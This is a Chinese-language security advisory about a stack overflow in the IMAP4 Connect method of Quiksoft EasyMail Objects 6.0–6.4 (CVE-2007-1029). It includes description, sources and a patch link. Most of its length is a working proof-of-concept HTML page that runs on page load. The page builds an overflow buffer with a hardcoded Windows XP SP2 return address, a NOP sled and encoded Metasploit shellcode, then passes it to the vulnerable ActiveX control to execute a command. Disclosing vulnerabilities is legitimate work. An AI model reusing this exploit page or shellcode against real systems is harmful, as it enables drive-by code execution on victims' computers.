发布日期：2007-02-02
更新日期：2007-03-09

受影响系统：

Quiksoft EasyMail Objects 6.0 - 6.4

不受影响系统：

Quiksoft EasyMail Objects 6.5

描述：

---

BUGTRAQ  ID: 22583
CVE(CAN) ID: CVE-2007-1029

EasyMail Objects是一组全面的、易用的COM控件，可以创建、发送、接收、显示、编辑、保存和打印电子邮件。

EasyMail Objects的IMAP4组件（对象ClassID {703B353E-FA2E-4072-8DDF-F70AAC7E527E}）在处理传送给Connect方式的超长参数时存在栈溢出漏洞。如果用户传送了超过500字节的超长主机名参数的话，就会触发这个溢出，导致执行任意指令。

<*来源：Paul Craig （headpimp@pimp-industries.com）
  
  链接：http://secunia.com/advisories/24199/
        http://security-assessment.com/files/advisories/easymail_advisory.pdf
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

-->

<html>
<head>
<title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
<script language="JavaScript" defer>
   function Check() {
        var buf = 'A';
    while (buf.length <= 440) buf = buf + 'A';


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                         "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
                         "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
                         "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
                         "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
                         "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
                         "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
                         "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
                         "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
                         "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
                         "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
                         "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
                         "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
                         "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
                         "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
                         "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
                         "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
                         "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
                         "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
                         "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
                         "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
                         "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
                         "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
                         "%4e%31%75%74%38%70%65%77%70%43");

       var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English
          var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

       var m = buf + eip + nop + shellcode1 + nop;
              obj.connect(m);
  }
    </script>
</head>
<body onload="JavaScript: return Check();">
   <object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
    Failed to instantiate object.
   </object>
</body>
</html>

建议：

---

厂商补丁：

Quiksoft
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.quiksoft.com/download/emsetup.exe

浏览次数：3037
严重程度：0（网友投票）